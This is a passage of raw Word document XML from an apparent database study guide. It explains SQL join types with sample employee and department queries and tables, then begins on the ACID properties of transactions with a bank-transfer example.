    <w:p w14:paraId="5B01C480" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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Retrieves all rows from the left table and the matched rows from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC5284" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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If there is no match, the result will contain NULL values for columns from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385680FF"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699F97F7"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95DD10"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524E6BBA"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LEFT JOIN departments d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587B243"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RIGHT JOIN (or RIGHT OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE7932" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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Retrieves all rows from the right table and the matched rows from the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C7098" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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If there is no match, the result will contain NULL values for columns from the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D48539A"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC39B9"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF54F0"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A2FCA"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RIGHT JOIN departments d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B81F7D"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FULL JOIN (or FULL OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799CFDB6" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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Retrieves all rows when there is a match in one of the tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BE2056" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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It returns NULL for non-matching rows from both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB4867"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4563FE"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1019F98B"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86FD0C"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lastRenderedPageBreak/>
        <w:t>FULL OUTER JOIN departments d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A68E01"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CROSS JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A26B44" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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Returns the Cartesian product of both tables. That means it will return all possible combinations of rows between the two tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA04AB" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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Use this with caution as it can result in large result sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791DC6D"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C2264E"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ELECT e.employee_name, p.project_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6044369B"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFC1F5"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CROSS JOIN projects p;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0B231"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Key Uses of Joins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0C1A4"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Combining Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Joins allow you to combine related data from multiple tables into a single result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72418120"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liminating Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of storing repeated information in a single table, you can store it across multiple tables and link them using joins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56038C94"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Querying Related Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Joins are essential when you need to access information that is split across different entities, like retrieving employee details with their corresponding department, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6134EF97"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Example with Multiple Tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D86E4A"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Consider two tables: employees and departments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780BDF13"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employees:</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1263"/>
        <w:gridCol w:w="1592"/>
        <w:gridCol w:w="1451"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="536D2AF7" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A79E611"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employee_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="317C1848"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employee_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00BC509C"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department_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="10FBF393" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E162BB6"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5397AC39"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CB6EF01"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="631D67C2" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CBC0BC5"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="451C5557"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Bob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B02BD19"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A226B18"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departments:</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1451"/>
        <w:gridCol w:w="1795"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="378BAD74" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15736DF5"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department_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="084E1BC3"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department_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="63DC36AB" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="048A1C07"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4161E6B3"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HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0BC04696" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="122A2F91"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="776F814C"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IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A609346"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If you want to list employees with their department names, you would use an </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INNER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to match the department_id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FED9C5"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF51F46"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BDAFED"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INNER JOIN departments d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1212D55E"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Resul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07"/>
        <w:gridCol w:w="1795"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="14E425BF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77902873"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employee_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="706CB18B"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department_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="43DE10F0" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F88DACB"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="103E5F63"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HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="76418DF8" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393C94F7"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Bob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="642B9009"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IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BF06817"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Joins help in relational database design by allowing efficient querying and retrieval of related data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F107B9" w14:textId="31E057F9" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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BD3A7FC">
          <v:rect id="_x0000_i2968" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CFDC50" w14:textId="53491173" w:rsidR="004A5A54" w:rsidRPr="00CE4B95" w:rsidRDefault="009E0966">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="709" w:name="_Toc196308189"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain ACID properties in the database</w:t>
      </w:r>
      <w:r w:rsidR="004A5A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="709"/>
    </w:p>
    <w:p w14:paraId="47C15206" w14:textId="5CEEFF2B" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="00393B05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ACID</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> properties are a set of four properties that ensure reliable and consistent transactions in a database system. These properties stand for </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Durability</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. They are crucial for maintaining the integrity of data during database transactions, especially in systems where multiple transactions are executed simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E74994D"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1. Atomicity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A191B"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Atomicity guarantees that a transaction is treated as a single "unit" of work. This means that either </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the operations in the transaction are successfully completed, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of them are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C11FD7E"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Key Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If any part of the transaction fails, the entire transaction is rolled back, and the database is left unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5936BF10"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In a bank transfer system, if transferring money from Account A to Account B fails after debiting from Account A but before crediting Account B, the transaction is rolled back, and no money is transferred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C9F0F"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7EB88D"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BEGIN TRANSACTION;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7AB23E"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   UPDATE Account SET balance = balance - 100 WHERE account_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014D721"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   UPDATE Account SET balance = balance + 100 WHERE account_id = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8DE854"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COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116A21A"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lastRenderedPageBreak/>
        <w:t>If either update fails, none of the updates will take place, ensuring atomicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C559323" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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628EB13">
          <v:rect id="_x0000_i2969" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FAA1CB"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2. Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1DE128"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consistency ensures that a transaction transforms the database from one valid state to another valid state. The database must follow all rules, constraints, and triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58539179"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Key Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A transaction that starts with the database in a consistent state must end with the database in a consistent state. This includes maintaining all integrity constraints like foreign keys, primary keys, and other business rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900B5E9"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A transaction that inserts a new order into the orders table and updates the inventory table must ensure that the quantity of the ordered item does not go below zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F7526"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424E13E9"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INSERT INTO orders (order_id, customer_id) VALUES (101, 1);</w:t>
